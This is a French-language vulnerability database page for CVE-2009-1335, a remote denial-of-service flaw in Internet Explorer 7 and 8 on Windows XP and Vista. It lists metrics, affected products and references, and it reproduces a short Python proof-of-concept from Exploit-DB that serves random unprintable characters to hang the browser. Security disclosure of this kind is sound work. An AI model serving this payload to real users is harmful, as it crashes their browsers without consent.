CVE-2009-1335 : Détail

CVE-2009-1335

1.89%V3
Network
2009-04-17
12h00 +00:00
2018-10-10
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft Internet Explorer 7 and 8 on Windows XP and Vista allows remote attackers to cause a denial of service (application hang) via a large document composed of unprintable characters, aka MSRC 9011jr.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 32902

Date de publication : 2009-04-10 22h00 +00:00
Auteur : Nam Nguyen
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/34478/info Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability. Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions. #/usr/bin/env python import sys import random CHAR_SET = [chr(x) for x in range(0x20)] CHAR_SET += [chr(x) for x in range(128, 256)] def send_file(): l = 800000 + 4096 print "Content-Type: text/plain" print "Content-Length: %d" % l print "Cache-Control: no-cache, no-store, must-revalidate" # this is not standardized, but use it anyway print "Pragma: no-cache" print "" # bypass IE download dialog sys.stdout.write("a" * 4096) # print junks for i in xrange(l): sys.stdout.write(random.choice(CHAR_SET)) sys.exit() send_file()

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_xp >> Version *

Références

http://www.securityfocus.com/bid/34478
Tags : vdb-entry, x_refsource_BID